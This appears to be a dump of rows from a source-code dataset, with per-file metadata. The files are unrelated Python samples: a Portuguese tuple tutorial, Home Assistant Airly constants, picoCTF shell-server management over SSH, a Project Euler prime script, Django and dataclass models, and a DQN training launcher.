# após o for aponto duas variaveis se quiser guadar separadamente
for pos, comida in enumerate(lanche):
print(f'Eu vou comer {comida} na posição {pos}')
# O metoto sorted cria lista com a tupla e organiza em ordem alfabetica
print(sorted(lanche))
a = (2, 5, 4)
b = (5, 8, 1, 2)
c = a + b
# soma de tuplas realiza a comutação de elementos, ou seja, apenas junta os elementos numa terceira tupla
print(c)
# Nesse caso, por tanto, a + b não sera igual b + a.. A ordem da soma influencia em como os elementos serão indexados
c = b + a
print(c)
print(len(c)) # imprime o número de elementos de c
print(c)
print(c.count(5)) # mosta a quantidade de elementos 5 que a tupla possui
print(c.count(4)) # mostra a quantidade de elementos 4 na tupla
print(c.count(9)) # mostra que não possui o elemento
print(c.index(8)) # mostra o indice do elemento
print(c.index(4)) # mostra o indice do elemento
print(c.index(5)) # mostra o indice do elemento, na caso do primeiro encontrado
print(c.index(5, 1)) # mostra o indice do elemento a partir do indice 1
# Uma tupla pode receber elementos de tipos diferentes
pessoa = ('Flavio', 32, 'Casado', 'peso', 110)
print(pessoa)
# É possivel deletar uma tupla durante a execução do programa com o comando del
del lanche
print(lanche)
| 0 | 0 | 0 |
ae8673c11ee0d05cecd9bcd7bafd2969050210b0 | 35 | py | Python | src/common/definitions.py | mehrdad-shokri/macro_pack | bcc39728ae70f99e95998cbb48a8beb9e7697031 | [
"Apache-2.0"
] | 3 | 2020-10-10T01:55:54.000Z | 2021-09-30T11:49:02.000Z | src/common/definitions.py | mehrdad-shokri/macro_pack | bcc39728ae70f99e95998cbb48a8beb9e7697031 | [
"Apache-2.0"
] | null | null | null | src/common/definitions.py | mehrdad-shokri/macro_pack | bcc39728ae70f99e95998cbb48a8beb9e7697031 | [
"Apache-2.0"
] | 1 | 2022-03-26T00:55:01.000Z | 2022-03-26T00:55:01.000Z |
VERSION="1.9.4"
LOGLEVEL = "INFO" | 8.75 | 17 | 0.628571 |
VERSION="1.9.4"
LOGLEVEL = "INFO" | 0 | 0 | 0 |
b4711b50dd2309b5e08e0c12639a56fa2342aea3 | 675 | py | Python | homeassistant/components/airly/const.py | miccico/core | 14c205384171dee59c1a908f8449f9864778b2dc | [
"Apache-2.0"
] | 6 | 2017-08-02T19:26:39.000Z | 2020-03-14T22:47:41.000Z | homeassistant/components/airly/const.py | miccico/core | 14c205384171dee59c1a908f8449f9864778b2dc | [
"Apache-2.0"
] | 54 | 2020-11-17T07:04:57.000Z | 2022-03-31T06:45:39.000Z | homeassistant/components/airly/const.py | miccico/core | 14c205384171dee59c1a908f8449f9864778b2dc | [
"Apache-2.0"
] | 14 | 2018-08-19T16:28:26.000Z | 2021-09-02T18:26:53.000Z | """Constants for Airly integration."""
ATTR_API_ADVICE = "ADVICE"
ATTR_API_CAQI = "CAQI"
ATTR_API_CAQI_DESCRIPTION = "DESCRIPTION"
ATTR_API_CAQI_LEVEL = "LEVEL"
ATTR_API_HUMIDITY = "HUMIDITY"
ATTR_API_PM1 = "PM1"
ATTR_API_PM10 = "PM10"
ATTR_API_PM10_LIMIT = "PM10_LIMIT"
ATTR_API_PM10_PERCENT = "PM10_PERCENT"
ATTR_API_PM25 = "PM25"
ATTR_API_PM25_LIMIT = "PM25_LIMIT"
ATTR_API_PM25_PERCENT = "PM25_PERCENT"
ATTR_API_PRESSURE = "PRESSURE"
ATTR_API_TEMPERATURE = "TEMPERATURE"
CONF_USE_NEAREST = "use_nearest"
DEFAULT_NAME = "Airly"
DOMAIN = "airly"
MANUFACTURER = "Airly sp. z o.o."
MAX_REQUESTS_PER_DAY = 100
NO_AIRLY_SENSORS = "There are no Airly sensors in this area yet."
| 30.681818 | 65 | 0.786667 | """Constants for Airly integration."""
ATTR_API_ADVICE = "ADVICE"
ATTR_API_CAQI = "CAQI"
ATTR_API_CAQI_DESCRIPTION = "DESCRIPTION"
ATTR_API_CAQI_LEVEL = "LEVEL"
ATTR_API_HUMIDITY = "HUMIDITY"
ATTR_API_PM1 = "PM1"
ATTR_API_PM10 = "PM10"
ATTR_API_PM10_LIMIT = "PM10_LIMIT"
ATTR_API_PM10_PERCENT = "PM10_PERCENT"
ATTR_API_PM25 = "PM25"
ATTR_API_PM25_LIMIT = "PM25_LIMIT"
ATTR_API_PM25_PERCENT = "PM25_PERCENT"
ATTR_API_PRESSURE = "PRESSURE"
ATTR_API_TEMPERATURE = "TEMPERATURE"
CONF_USE_NEAREST = "use_nearest"
DEFAULT_NAME = "Airly"
DOMAIN = "airly"
MANUFACTURER = "Airly sp. z o.o."
MAX_REQUESTS_PER_DAY = 100
NO_AIRLY_SENSORS = "There are no Airly sensors in this area yet."
| 0 | 0 | 0 |
8c16acba335b485450860d2503f0893ea8f879a0 | 803 | py | Python | bettermonitoring/models.py | SayHelloRoman/BetterMonitoring | a26af6a9ab01660c0445d92f25b8ed14f63aa03d | [
"MIT"
] | 5 | 2022-03-26T17:19:23.000Z | 2022-03-27T19:46:09.000Z | bettermonitoring/models.py | SayHelloRoman/BetterMonitoring | a26af6a9ab01660c0445d92f25b8ed14f63aa03d | [
"MIT"
] | null | null | null | bettermonitoring/models.py | SayHelloRoman/BetterMonitoring | a26af6a9ab01660c0445d92f25b8ed14f63aa03d | [
"MIT"
] | 2 | 2022-03-26T17:19:31.000Z | 2022-03-26T18:57:38.000Z | from typing import List, Optional
from dataclasses import dataclass
@dataclass
@dataclass
@dataclass
@dataclass | 14.87037 | 34 | 0.620174 | from typing import List, Optional
from dataclasses import dataclass
@dataclass
class Bot:
avatar: str
botID: str
username: str
discrim: str
shortDesc: str
prefix: str
votes: int
ownerID: str
coowners: List[str]
tags: List[str]
longDesc: str
background: str
certificate: str
github: str
support: str
website: str
owner: str = ""
@dataclass
class User:
id: str
biography: str
website: str
github: str
instagram: str
twitter: Optional[str] = None
@dataclass
class Server:
id: str
avatar: str
name: str
owner: str
shortDesc: str
longDesc: str
votes: int
bumps: int
tags: list
@dataclass
class Comment:
author: str
star_rate: str
message: str
date: float | 0 | 594 | 90 |
3e0c262fa2f0a9220966a57cff9f22df7b123f5f | 10,939 | py | Python | picoCTF-web/api/shell_servers.py | NNHSSE201819/picoCTF | eae563c2e68dce85a1c426d086b422dc25649003 | [
"MIT"
] | null | null | null | picoCTF-web/api/shell_servers.py | NNHSSE201819/picoCTF | eae563c2e68dce85a1c426d086b422dc25649003 | [
"MIT"
] | null | null | null | picoCTF-web/api/shell_servers.py | NNHSSE201819/picoCTF | eae563c2e68dce85a1c426d086b422dc25649003 | [
"MIT"
] | null | null | null | import json
import api
import pymongo
import spur
from api.common import (check, InternalException, safe_fail, validate,
WebException)
from voluptuous import Length, Required, Schema
server_schema = Schema(
{
Required("name"):
check(
("Name must be a reasonable string.", [str,
Length(min=1, max=128)])),
Required("host"):
check(
("Host must be a reasonable string", [str,
Length(min=1, max=128)])),
Required("port"):
check(("You have to supply a valid integer for your port.", [int]),
("Your port number must be in the valid range 1-65535.",
[lambda x: 1 <= int(x) and int(x) <= 65535])),
Required("username"):
check(("Username must be a reasonable string",
[str, Length(min=1, max=128)])),
Required("password"):
check(("Username must be a reasonable string",
[str, Length(min=1, max=128)])),
Required("protocol"):
check(("Protocol must be either HTTP or HTTPS",
[lambda x: x in ['HTTP', 'HTTPS']])),
"server_number":
check(("Server number must be an integer.", [int]),
("Server number must be a positive integer.",
[lambda x: 0 < int(x)])),
},
extra=True)
def get_server(sid=None, name=None):
"""
Returns the server object corresponding to the sid provided
Args:
sid: the server id to lookup
Returns:
The server object
"""
db = api.common.get_conn()
if sid is None:
if name is None:
raise InternalException("You must specify either an sid or name")
else:
sid = api.common.hash(name)
server = db.shell_servers.find_one({"sid": sid})
if server is None:
raise InternalException(
"Server with sid '{}' does not exist".format(sid))
return server
def get_server_number(sid):
"""
Gets the server_number designation from sid
"""
if sid is None:
raise InternalException("You must specify a sid")
server = get_server(sid=sid)
if server is None:
raise InternalException(
"Server with sid '{}' does not exist".format(sid))
return server.get("server_number")
def get_connection(sid):
"""
Attempts to connect to the given server and returns a connection.
"""
server = get_server(sid)
try:
shell = spur.SshShell(
hostname=server["host"],
username=server["username"],
password=server["password"],
port=server["port"],
missing_host_key=spur.ssh.MissingHostKey.accept,
connect_timeout=10)
shell.run(["echo", "connected"])
except spur.ssh.ConnectionError as e:
raise WebException(
"Cannot connect to {}@{}:{} with the specified password".format(
server["username"], server["host"], server["port"]))
return shell
def ensure_setup(shell):
"""
Runs sanity checks on the shell connection to ensure that
shell_manager is set up correctly.
Leaves connection open.
"""
result = shell.run(
["sudo", "/picoCTF-env/bin/shell_manager", "status"], allow_error=True)
if result.return_code == 1 and "command not found" in result.stderr_output.decode(
"utf-8"):
raise WebException("shell_manager not installed on server.")
def add_server(params):
"""
Add a shell server to the pool of servers. First server is
automatically assigned server_number 1 (yes, 1-based numbering)
if not otherwise specified.
Args:
params: A dict containing:
host
port
username
password
server_number
Returns:
The sid.
"""
db = api.common.get_conn()
validate(server_schema, params)
if isinstance(params["port"], str):
params["port"] = int(params["port"])
if isinstance(params.get("server_number"), str):
params["server_number"] = int(params["server_number"])
if safe_fail(get_server, name=params["name"]) is not None:
raise WebException("Shell server with this name already exists")
params["sid"] = api.common.hash(params["name"])
# Automatically set first added server as server_number 1
if db.shell_servers.count() == 0:
params["server_number"] = params.get("server_number", 1)
db.shell_servers.insert(params)
return params["sid"]
# Probably do not need/want the sid here anymore.
def update_server(sid, params):
"""
Update a shell server from the pool of servers.
Args:
sid: The sid of the server to update
params: A dict containing:
port
username
password
server_number
"""
db = api.common.get_conn()
validate(server_schema, params)
server = safe_fail(get_server, sid=sid)
if server is None:
raise WebException(
"Shell server with sid '{}' does not exist.".format(sid))
params["name"] = server["name"]
validate(server_schema, params)
if isinstance(params["port"], str):
params["port"] = int(params["port"])
if isinstance(params.get("server_number"), str):
params["server_number"] = int(params["server_number"])
db.shell_servers.update({"sid": server["sid"]}, {"$set": params})
def remove_server(sid):
"""
Remove a shell server from the pool of servers.
Args:
sid: the sid of the server to be removed
"""
db = api.common.get_conn()
if db.shell_servers.find_one({"sid": sid}) is None:
raise WebException(
"Shell server with sid '{}' does not exist.".format(sid))
db.shell_servers.remove({"sid": sid})
def get_servers(get_all=False):
"""
Returns the list of added shell servers, or the assigned shell server
shard if sharding is enabled. Defaults to server 1 if not assigned
"""
db = api.common.get_conn()
settings = api.config.get_settings()
match = {}
if not get_all and settings["shell_servers"]["enable_sharding"]:
team = api.team.get_team()
match = {"server_number": team.get("server_number", 1)}
servers = list(db.shell_servers.find(match, {"_id": 0}))
if len(servers) == 0 and settings["shell_servers"]["enable_sharding"]:
raise InternalException(
"Your assigned shell server is currently down. Please contact an admin."
)
return servers
def get_problem_status_from_server(sid):
"""
Connects to the server and checks the status of the problems running there.
Runs `sudo shell_manager status --json` and parses its output.
Closes connection after running command.
Args:
sid: The sid of the server to check
Returns:
A tuple containing:
- True if all problems are online and false otherwise
- The output data of shell_manager status --json
"""
shell = get_connection(sid)
ensure_setup(shell)
with shell:
output = shell.run(
["sudo", "/picoCTF-env/bin/shell_manager", "status",
"--json"]).output.decode("utf-8")
data = json.loads(output)
all_online = True
for problem in data["problems"]:
for instance in problem["instances"]:
# if the service is not working
if not instance["service"]:
all_online = False
# if the connection is not working and it is a remote challenge
if not instance["connection"] and instance["port"] is not None:
all_online = False
return (all_online, data)
def load_problems_from_server(sid):
"""
Connects to the server and loads the problems from its deployment state.
Runs `sudo shell_manager publish` and captures its output.
Closes connection after running command.
Args:
sid: The sid of the server to load problems from.
Returns:
The number of problems loaded
"""
shell = get_connection(sid)
with shell:
result = shell.run(["sudo", "/picoCTF-env/bin/shell_manager", "publish"])
data = json.loads(result.output.decode("utf-8"))
# Pass along the server
data["sid"] = sid
api.problem.load_published(data)
has_instances = lambda p: len(p["instances"]) > 0
return len(list(filter(has_instances, data["problems"])))
def get_assigned_server_number(new_team=True, tid=None):
"""
Assigns a server number based on current teams count and
configured stepping
Returns:
(int) server_number
"""
settings = api.config.get_settings()["shell_servers"]
db = api.common.get_conn()
if new_team:
team_count = db.teams.count()
else:
if not tid:
raise InternalException("tid must be specified.")
oid = db.teams.find_one({"tid": tid}, {"_id": 1})
if not oid:
raise InternalException("Invalid tid.")
team_count = db.teams.count({"_id": {"$lt": oid["_id"]}})
assigned_number = 1
steps = settings["steps"]
if steps:
if team_count < steps[-1]:
for i, step in enumerate(steps):
if team_count < step:
assigned_number = i + 1
break
else:
assigned_number = 1 + len(steps) + (
team_count - steps[-1]) // settings["default_stepping"]
else:
assigned_number = team_count // settings["default_stepping"] + 1
if settings["limit_added_range"]:
max_number = list(
db.shell_servers.find({}, {
"server_number": 1
}).sort("server_number", -1).limit(1))[0]["server_number"]
return min(max_number, assigned_number)
else:
return assigned_number
| 28.339378 | 86 | 0.588811 | import json
import api
import pymongo
import spur
from api.common import (check, InternalException, safe_fail, validate,
WebException)
from voluptuous import Length, Required, Schema
server_schema = Schema(
{
Required("name"):
check(
("Name must be a reasonable string.", [str,
Length(min=1, max=128)])),
Required("host"):
check(
("Host must be a reasonable string", [str,
Length(min=1, max=128)])),
Required("port"):
check(("You have to supply a valid integer for your port.", [int]),
("Your port number must be in the valid range 1-65535.",
[lambda x: 1 <= int(x) and int(x) <= 65535])),
Required("username"):
check(("Username must be a reasonable string",
[str, Length(min=1, max=128)])),
Required("password"):
check(("Username must be a reasonable string",
[str, Length(min=1, max=128)])),
Required("protocol"):
check(("Protocol must be either HTTP or HTTPS",
[lambda x: x in ['HTTP', 'HTTPS']])),
"server_number":
check(("Server number must be an integer.", [int]),
("Server number must be a positive integer.",
[lambda x: 0 < int(x)])),
},
extra=True)
def get_server(sid=None, name=None):
"""
Returns the server object corresponding to the sid provided
Args:
sid: the server id to lookup
Returns:
The server object
"""
db = api.common.get_conn()
if sid is None:
if name is None:
raise InternalException("You must specify either an sid or name")
else:
sid = api.common.hash(name)
server = db.shell_servers.find_one({"sid": sid})
if server is None:
raise InternalException(
"Server with sid '{}' does not exist".format(sid))
return server
def get_server_number(sid):
"""
Gets the server_number designation from sid
"""
if sid is None:
raise InternalException("You must specify a sid")
server = get_server(sid=sid)
if server is None:
raise InternalException(
"Server with sid '{}' does not exist".format(sid))
return server.get("server_number")
def get_connection(sid):
"""
Attempts to connect to the given server and returns a connection.
"""
server = get_server(sid)
try:
shell = spur.SshShell(
hostname=server["host"],
username=server["username"],
password=server["password"],
port=server["port"],
missing_host_key=spur.ssh.MissingHostKey.accept,
connect_timeout=10)
shell.run(["echo", "connected"])
except spur.ssh.ConnectionError as e:
raise WebException(
"Cannot connect to {}@{}:{} with the specified password".format(
server["username"], server["host"], server["port"]))
return shell
def ensure_setup(shell):
"""
Runs sanity checks on the shell connection to ensure that
shell_manager is set up correctly.
Leaves connection open.
"""
result = shell.run(
["sudo", "/picoCTF-env/bin/shell_manager", "status"], allow_error=True)
if result.return_code == 1 and "command not found" in result.stderr_output.decode(
"utf-8"):
raise WebException("shell_manager not installed on server.")
def add_server(params):
"""
Add a shell server to the pool of servers. First server is
automatically assigned server_number 1 (yes, 1-based numbering)
if not otherwise specified.
Args:
params: A dict containing:
host
port
username
password
server_number
Returns:
The sid.
"""
db = api.common.get_conn()
validate(server_schema, params)
if isinstance(params["port"], str):
params["port"] = int(params["port"])
if isinstance(params.get("server_number"), str):
params["server_number"] = int(params["server_number"])
if safe_fail(get_server, name=params["name"]) is not None:
raise WebException("Shell server with this name already exists")
params["sid"] = api.common.hash(params["name"])
# Automatically set first added server as server_number 1
if db.shell_servers.count() == 0:
params["server_number"] = params.get("server_number", 1)
db.shell_servers.insert(params)
return params["sid"]
# Probably do not need/want the sid here anymore.
def update_server(sid, params):
"""
Update a shell server from the pool of servers.
Args:
sid: The sid of the server to update
params: A dict containing:
port
username
password
server_number
"""
db = api.common.get_conn()
validate(server_schema, params)
server = safe_fail(get_server, sid=sid)
if server is None:
raise WebException(
"Shell server with sid '{}' does not exist.".format(sid))
params["name"] = server["name"]
validate(server_schema, params)
if isinstance(params["port"], str):
params["port"] = int(params["port"])
if isinstance(params.get("server_number"), str):
params["server_number"] = int(params["server_number"])
db.shell_servers.update({"sid": server["sid"]}, {"$set": params})
def remove_server(sid):
"""
Remove a shell server from the pool of servers.
Args:
sid: the sid of the server to be removed
"""
db = api.common.get_conn()
if db.shell_servers.find_one({"sid": sid}) is None:
raise WebException(
"Shell server with sid '{}' does not exist.".format(sid))
db.shell_servers.remove({"sid": sid})
def get_servers(get_all=False):
"""
Returns the list of added shell servers, or the assigned shell server
shard if sharding is enabled. Defaults to server 1 if not assigned
"""
db = api.common.get_conn()
settings = api.config.get_settings()
match = {}
if not get_all and settings["shell_servers"]["enable_sharding"]:
team = api.team.get_team()
match = {"server_number": team.get("server_number", 1)}
servers = list(db.shell_servers.find(match, {"_id": 0}))
if len(servers) == 0 and settings["shell_servers"]["enable_sharding"]:
raise InternalException(
"Your assigned shell server is currently down. Please contact an admin."
)
return servers
def get_problem_status_from_server(sid):
"""
Connects to the server and checks the status of the problems running there.
Runs `sudo shell_manager status --json` and parses its output.
Closes connection after running command.
Args:
sid: The sid of the server to check
Returns:
A tuple containing:
- True if all problems are online and false otherwise
- The output data of shell_manager status --json
"""
shell = get_connection(sid)
ensure_setup(shell)
with shell:
output = shell.run(
["sudo", "/picoCTF-env/bin/shell_manager", "status",
"--json"]).output.decode("utf-8")
data = json.loads(output)
all_online = True
for problem in data["problems"]:
for instance in problem["instances"]:
# if the service is not working
if not instance["service"]:
all_online = False
# if the connection is not working and it is a remote challenge
if not instance["connection"] and instance["port"] is not None:
all_online = False
return (all_online, data)
def load_problems_from_server(sid):
"""
Connects to the server and loads the problems from its deployment state.
Runs `sudo shell_manager publish` and captures its output.
Closes connection after running command.
Args:
sid: The sid of the server to load problems from.
Returns:
The number of problems loaded
"""
shell = get_connection(sid)
with shell:
result = shell.run(["sudo", "/picoCTF-env/bin/shell_manager", "publish"])
data = json.loads(result.output.decode("utf-8"))
# Pass along the server
data["sid"] = sid
api.problem.load_published(data)
has_instances = lambda p: len(p["instances"]) > 0
return len(list(filter(has_instances, data["problems"])))
def get_assigned_server_number(new_team=True, tid=None):
"""
Assigns a server number based on current teams count and
configured stepping
Returns:
(int) server_number
"""
settings = api.config.get_settings()["shell_servers"]
db = api.common.get_conn()
if new_team:
team_count = db.teams.count()
else:
if not tid:
raise InternalException("tid must be specified.")
oid = db.teams.find_one({"tid": tid}, {"_id": 1})
if not oid:
raise InternalException("Invalid tid.")
team_count = db.teams.count({"_id": {"$lt": oid["_id"]}})
assigned_number = 1
steps = settings["steps"]
if steps:
if team_count < steps[-1]:
for i, step in enumerate(steps):
if team_count < step:
assigned_number = i + 1
break
else:
assigned_number = 1 + len(steps) + (
team_count - steps[-1]) // settings["default_stepping"]
else:
assigned_number = team_count // settings["default_stepping"] + 1
if settings["limit_added_range"]:
max_number = list(
db.shell_servers.find({}, {
"server_number": 1
}).sort("server_number", -1).limit(1))[0]["server_number"]
return min(max_number, assigned_number)
else:
return assigned_number
def reassign_teams(include_assigned=False):
db = api.common.get_conn()
if include_assigned:
teams = api.team.get_all_teams(show_ineligible=True)
else:
teams = list(
db.teams.find({
"server_number": {
"$exists": False
}
}, {
"_id": 0,
"tid": 1
}))
for team in teams:
old_server_number = team.get("server_number")
server_number = get_assigned_server_number(
new_team=False, tid=team["tid"])
if old_server_number != server_number:
db.teams.update({
'tid': team["tid"]
}, {'$set': {
'server_number': server_number,
'instances': {}
}})
# Re-assign instances
safe_fail(api.problem.get_visible_problems, team["tid"])
return len(teams)
| 909 | 0 | 23 |
beaff1178d4740cb4337f374ec7eb5c81cf74ca9 | 494 | py | Python | project_euler/49.py | huangshenno1/project_euler | 8a3c91fd11bcb6a6a830e963b1d5aed3f5ff787d | [
"MIT"
] | null | null | null | project_euler/49.py | huangshenno1/project_euler | 8a3c91fd11bcb6a6a830e963b1d5aed3f5ff787d | [
"MIT"
] | null | null | null | project_euler/49.py | huangshenno1/project_euler | 8a3c91fd11bcb6a6a830e963b1d5aed3f5ff787d | [
"MIT"
] | null | null | null | maxn = 10000
isprime = [False] * 2 + [True] * maxn
for i in range(2, maxn):
if isprime[i]:
j = i*i
while j < maxn:
isprime[j] = False
j += i
for a in range(1000, 10000):
if isprime[a]:
code = encode(a)
for inc in range(1, 4500):
b = a + inc
c = a + inc * 2
if c >= 10000:
break
if isprime[b] and isprime[c]:
if encode(b) == code and encode(c) == code:
print a, b, c
| 17.034483 | 47 | 0.534413 | maxn = 10000
isprime = [False] * 2 + [True] * maxn
for i in range(2, maxn):
if isprime[i]:
j = i*i
while j < maxn:
isprime[j] = False
j += i
def encode(x):
ret = 0
while x > 0:
ret += (x % 10)**3
x = x / 10
return ret
for a in range(1000, 10000):
if isprime[a]:
code = encode(a)
for inc in range(1, 4500):
b = a + inc
c = a + inc * 2
if c >= 10000:
break
if isprime[b] and isprime[c]:
if encode(b) == code and encode(c) == code:
print a, b, c
| 62 | 0 | 23 |
9ad449957441de10a4ab92d15ddf24c511bdb3ab | 324 | py | Python | cms/models.py | silencemind/Department-Managment-System | e39a28e5043344d323a4af639dca7e79c888f259 | [
"PostgreSQL"
] | 1 | 2020-12-10T15:04:59.000Z | 2020-12-10T15:04:59.000Z | cms/models.py | silencemind/College-Managment-System | e39a28e5043344d323a4af639dca7e79c888f259 | [
"PostgreSQL"
] | 5 | 2020-11-04T07:49:11.000Z | 2021-06-10T20:22:10.000Z | cms/models.py | silencemind/Department-Managment-System | e39a28e5043344d323a4af639dca7e79c888f259 | [
"PostgreSQL"
] | null | null | null | from django.db import models
from datetime import datetime
# date = models.DateField(default=datetime.date.today)
| 23.142857 | 61 | 0.660494 | from django.db import models
from datetime import datetime
class announcments(models.Model):
msg = models.CharField(max_length=200, null=True)
date = models.DateField(null=True)
# date = models.DateField(default=datetime.date.today)
def __str__(self):
return self.msg
| 25 | 113 | 62 |
69ab91afef13f6535ec6cb06a7794d0211e4c9bf | 126 | py | Python | inheritance/need_for_speed/project/race_motorcycle.py | lowrybg/PythonOOP | 1ef5023ca76645d5d96b8c4fb9a54d0f431a1947 | [
"MIT"
] | null | null | null | inheritance/need_for_speed/project/race_motorcycle.py | lowrybg/PythonOOP | 1ef5023ca76645d5d96b8c4fb9a54d0f431a1947 | [
"MIT"
] | null | null | null | inheritance/need_for_speed/project/race_motorcycle.py | lowrybg/PythonOOP | 1ef5023ca76645d5d96b8c4fb9a54d0f431a1947 | [
"MIT"
] | null | null | null | from project.motorcycle import Motorcycle
| 21 | 41 | 0.793651 | from project.motorcycle import Motorcycle
class RaceMotorcycle(Motorcycle):
DEFAULT_FUEL_CONSUMPTION: float = 8
pass | 0 | 61 | 23 |
065c36d678b37e87f02d2042268e88eb0f4fc4f8 | 2,260 | py | Python | experiment.py | meetjannik/deep-q-network | a6d01817e8b53591c5aa09018d9831d1f06b7f47 | [
"MIT"
] | 1 | 2022-03-25T13:22:41.000Z | 2022-03-25T13:22:41.000Z | experiment.py | meetjannik/dqn | a6d01817e8b53591c5aa09018d9831d1f06b7f47 | [
"MIT"
] | null | null | null | experiment.py | meetjannik/dqn | a6d01817e8b53591c5aa09018d9831d1f06b7f47 | [
"MIT"
] | null | null | null | import argparse
import logging
import os
from src.algorithm import deep_q_learning
from torch.utils.tensorboard import SummaryWriter
import warnings
import gym
from src.agent import DQNAgent
from src.environment import DQNEnvironment
from datetime import datetime
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# see Extended Data Table 1
parser.add_argument('--mini_batch_size', default=32)
parser.add_argument('--replay_memory_size', default=100000) # 1000000
parser.add_argument('--agent_history_length', default=4)
parser.add_argument('--target_update_frequency', default=10000) # target_network_update_frequency
parser.add_argument('--gamma', default=0.99) # discount factor
parser.add_argument('--action_repeat', default=4)
parser.add_argument('--update_frequency', default=4)
parser.add_argument('--learning_rate', default=0.00025)
parser.add_argument('--gradient_momentum', default=0.95)
parser.add_argument('--squared_gradient_momentum', default=0.95)
parser.add_argument('--min_squared_gradient', default=0.01)
parser.add_argument('--epsilon_start', default=1) # initial_epsilon
parser.add_argument('--epsilon_end', default=0.1) # final_epsilon
parser.add_argument('--epsilon_decay', default=1000000) # final_epsilon_frame
parser.add_argument('--replay_start_size', default=25000) # 50000
parser.add_argument('--max_n_wait_actions', default=30) # no_op_max
# see Caption of Extended Data Table 3
parser.add_argument('--n_training_steps', default=10000000)
parser.add_argument('--evaluation_frequency', default=250000)
parser.add_argument('--n_evaluation_steps', default=135000)
args = parser.parse_args()
games = ['Breakout', 'Enduro', 'Riverraid', 'Seaquest', 'Spaceinvaders']
for game in games:
experiment_name = datetime.today().strftime('%Y-%m-%d') + '_' + game
# NoFrameskip - ensures no frames are skipped by the emulator
# v4 - ensures actions are executed, whereas v0 would ignore an action with 0.25 probability
max_avg_episode_score = deep_q_learning(environment_name=game, experiment_name=experiment_name, args=args)
print(f'{game} Score: {max_avg_episode_score}')
| 42.641509 | 114 | 0.74115 | import argparse
import logging
import os
from src.algorithm import deep_q_learning
from torch.utils.tensorboard import SummaryWriter
import warnings
import gym
from src.agent import DQNAgent
from src.environment import DQNEnvironment
from datetime import datetime
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# see Extended Data Table 1
parser.add_argument('--mini_batch_size', default=32)
parser.add_argument('--replay_memory_size', default=100000) # 1000000
parser.add_argument('--agent_history_length', default=4)
parser.add_argument('--target_update_frequency', default=10000) # target_network_update_frequency
parser.add_argument('--gamma', default=0.99) # discount factor
parser.add_argument('--action_repeat', default=4)
parser.add_argument('--update_frequency', default=4)
parser.add_argument('--learning_rate', default=0.00025)
parser.add_argument('--gradient_momentum', default=0.95)
parser.add_argument('--squared_gradient_momentum', default=0.95)
parser.add_argument('--min_squared_gradient', default=0.01)
parser.add_argument('--epsilon_start', default=1) # initial_epsilon
parser.add_argument('--epsilon_end', default=0.1) # final_epsilon
parser.add_argument('--epsilon_decay', default=1000000) # final_epsilon_frame
parser.add_argument('--replay_start_size', default=25000) # 50000
parser.add_argument('--max_n_wait_actions', default=30) # no_op_max
# see Caption of Extended Data Table 3
parser.add_argument('--n_training_steps', default=10000000)
parser.add_argument('--evaluation_frequency', default=250000)
parser.add_argument('--n_evaluation_steps', default=135000)
args = parser.parse_args()
games = ['Breakout', 'Enduro', 'Riverraid', 'Seaquest', 'Spaceinvaders']
for game in games:
experiment_name = datetime.today().strftime('%Y-%m-%d') + '_' + game
# NoFrameskip - ensures no frames are skipped by the emulator
# v4 - ensures actions are executed, whereas v0 would ignore an action with 0.25 probability
max_avg_episode_score = deep_q_learning(environment_name=game, experiment_name=experiment_name, args=args)
print(f'{game} Score: {max_avg_episode_score}')
| 0 | 0 | 0 |